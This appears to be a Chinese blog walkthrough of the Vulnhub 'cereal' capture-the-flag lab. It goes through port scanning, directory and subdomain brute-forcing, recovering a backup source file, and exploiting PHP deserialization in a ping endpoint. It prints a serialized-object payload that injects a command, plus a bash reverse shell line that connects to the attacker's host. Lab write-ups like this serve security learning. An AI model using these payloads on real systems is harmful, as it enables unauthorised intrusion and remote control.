当前位置：网站首页>vulnhub之cereal

vulnhub之cereal

2022-07-03 11:05:00 【梅_花_七】

一、主机发现

二、端口扫描

一、主机发现

二、端口扫描

三、服务版本探测

四、端口分析

1.21 ftp

21端口上就是开放了ftp服务，这也是ftp默认端口，我们可以知道ftp服务器ip，还知道可以匿名登录

2.22 80

开放了常用的服务ssh和http服务

3.139 445 3306

139 445一般部署的smb服务，只是基于不同的协议。

3306 mysql数据常用端口。这里显示允许连接。

4.其他端口

至于其他端口，除了44441开放了一个http服务，剩下的没有太多有效信息，服务也都没扫出来

五、信息收集

1.80

主页面没收获

源码：接口，隐藏目录，泄露源码都没发现。无收获

2.44441

更是啥都没有

六、目录爆破

1.80

（1）默认字典

直接扫，dir默认用common.txt跑，扫出来这些目录

可以一个wordpress（通过其他链接进行的判断）的后台登录界面，尝试弱口令无效

（2）/blog

有个域名信息，backup备份，

（3）phpinfo

可以了解到一些接口信息，配置文件信息，服务器语言运行环境（php）

2.44441

这里没有有效信息。

3.换个大字典跑

没有别的信息了

七、绑定域名

访问，结果还是一个Apache的默认页面。尝试去对这个域名下进行目录的爆破，根据提示，找备份文件，结果扒拉扒拉，还是一无所获。

1.80

2.44441

八、gobuster子域名爆破

gobuster vhost -u http://cereal.ctf:44441 -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

这里发现了一个子域名

九、secure.cereal.ctf

将ip和host文件进行绑定后访问，80还是和主界面一样

44441端口下部署了这样一个东西

十、突破点

1.功能

这是一个执行ping操作的接口。而且调用了操作系统的ping命令

2.命令注入

| && ;用这些尝试

尝试失败

3.抓包解码

很明显，这是一个php序列化后的数据，如何去利用这个反序列化，如何确定有没有反序列化漏洞。我们只能通过代码审计来确定是否存在反序列化漏洞，来构造payload。

4.dirbuster爆破备份文件

（1）备份文件可能文件名

.svn .git

尝试失败

（2）备份目录爆破

结果出来有一个back_en路径，这一看就是备份文件路径

（3）备份文件

选用seclists下的conmon.txt来进行爆破，200状态正常

十一、下载备份文件并审计

1.index.php.bak文件

这就是后端的代码

十二、构造payload

找一个php在线网站来执行就可

<?php
    class pingTest {
        public $ipAddress = "192.168.0.106";
        public $isValid = True;
}
$obj = NEW pingTest;
$serilaze= serialize($obj);
echo urlencode($serilaze);

?>

十三、尝试注入

1.正常ping命令

2.反序列化造成的rce

在源码部分可以看到id命令执行成功执行

3.反弹shell

bash -i >& /dev/tcp/192.168.0.106/5555 0>&1

<?php
    class pingTest {
        public $ipAddress = "192.168.0.106;bash -i >& /dev/tcp/192.168.0.106/5555 0>&1 ";
        public $isValid = True;
}
$obj = NEW pingTest;
$serilaze= serialize($obj);
echo urlencode($serilaze);

?>

突破边界，反弹成功：